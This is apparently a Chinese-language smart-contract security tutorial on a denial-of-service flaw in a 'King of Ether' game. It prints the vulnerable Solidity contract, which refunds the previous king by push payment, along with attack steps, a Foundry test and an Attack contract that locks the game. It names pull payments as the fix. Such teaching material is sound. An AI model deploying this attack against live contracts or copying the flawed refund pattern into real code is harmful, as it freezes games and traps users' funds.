区块链安全常见的攻击分析——拒绝服务攻击 (Denial of Service-DOS)King合约【11】
区块链安全常见的攻击分析——拒绝服务攻击 Denial of Service
- 1.1 漏洞分析
- 1.2 漏洞合约
- 1.3 攻击步骤分析
- 解决方法
- 1.4 攻击合约
合约内容:在合约游戏中,新玩家通过发送比当前 King 更多的代币来成为新的 King,同时合约会将原 King 的代币退回。
重点:
如果原 King 是一个合约地址,并且合约没有实现 receive 或 fallback 函数来接收代币,退回代币的 call 操作会失败,从而导致整个合约无法继续运行,游戏中断。
1.1 漏洞分析
会把上一个king转进来的钱退回,如果上一个king接收退回的函数有问题,就会导致合约游戏终止。
1.2 漏洞合约
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import "forge-std/Test.sol";
/*
名称:拒绝服务攻击 (Denial of Service)
描述:
KingOfEther 合约设计了一场游戏,用户可以通过发送比当前余额更多的以太币来获得“王位”。
合约会尝试将当前余额返还给上一个“国王”,当新用户发送更多的以太币时。
然而,这种机制可能被利用。攻击者的合约(这里是 Attack 合约)可以成为“国王”,
然后在其回退函数中触发回退失败或者消耗超过规定的 Gas 限制,
导致当 KingOfEther 合约试图将以太币返还给上一个国王时,claimThrone 函数失败。
缓解措施:
使用 Pull payment 模式,解决方法是让用户自己提取他们的以太币,而不是直接将以太币发送给他们。
参考:
https://slowmist.medium.com/intro-to-smart-contract-security-audit-dos-e23e9e901e26
*/
contract KingOfEther {
address public king;
uint public balance;
function claimThrone() external payable {
require(msg.value > balance, "Need to pay more to become the king");
(bool sent, ) = king.call{value: balance}("");
require(sent, "Failed to send Ether");
balance = msg.value;
king = msg.sender;
}
}
1.3 攻击步骤分析
-
在攻击合约中调用 claimThrone 函数,成为当前 King。故意不实现 receive 或 fallback 函数,确保攻击合约无法接收退回的代币。
-
当下一个玩家(如 Aquarius)尝试通过调用 claimThrone 函数成为新的 King 时,合约会尝试将代币退回给攻击合约。
-
由于攻击合约无法接收代币,退回操作失败,导致交易回滚,Aquarius 的竞争失败。合约陷入死锁状态,游戏无法继续进行。
解决方法
如果攻击合约有receive接收函数,用户Aquarius会竞选成功
结果输出:
1.4 攻击合约
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import "forge-std/Test.sol";
import "./DOS.sol";
contract ContractTest is Test {
KingOfEther KingOfEtherContract;
Attack attackContract;
address Koko;
address Aquarius;
function setUp() public {
KingOfEtherContract = new KingOfEther();
attackContract = new Attack();
Koko = vm.addr(1);
Aquarius = vm.addr(2);
vm.deal(address(Koko), 1 ether);
vm.deal(address(Aquarius), 9 ether);
vm.deal(address(attackContract), 6 ether);
console.log("address(Koko):", address(Koko));
console.log("address(Aquarius):", address(Aquarius));
console.log("address(attackContract):", address(attackContract));
}
function testKingOfEther() public {
console.log(
"KingOfEther Contract king:",
KingOfEtherContract.king(),
"balance:",
KingOfEtherContract.balance()
);
vm.prank(Koko); // Koko 调函数,竞争king
console.log("koko claim king");
KingOfEtherContract.claimThrone{value: 1 ether}(); // 附带 1 ether 调用 claimThrone 函数
console.log(
"KingOfEther Contract king:",
KingOfEtherContract.king(),
"balance:",
KingOfEtherContract.balance()
);
// 攻击
console.log("ATTACK claim king..");
attackContract.attack{value: 6 ether}(address(KingOfEtherContract));
console.log(
"KingOfEther Contract king:",
KingOfEtherContract.king(),
"balance:",
KingOfEtherContract.balance()
);
vm.prank(Aquarius); // Aquarius 竞争king
console.log("Aquarius claim king");
vm.expectRevert("Failed to send Ether");
KingOfEtherContract.claimThrone{value: 9 ether}(); // 附带 9 ether 调用 claimThrone 函数
console.log("Aquarius FAIL !!");
console.log(
"KingOfEther Contract king:",
KingOfEtherContract.king(),
"balance:",
KingOfEtherContract.balance()
);
}
}
contract Attack {
address kingOfEtherAddress;
function attack(address _kingOfEtherAddress) public payable {
kingOfEtherAddress = _kingOfEtherAddress;
KingOfEther(kingOfEtherAddress).claimThrone{value: msg.value}();
}
}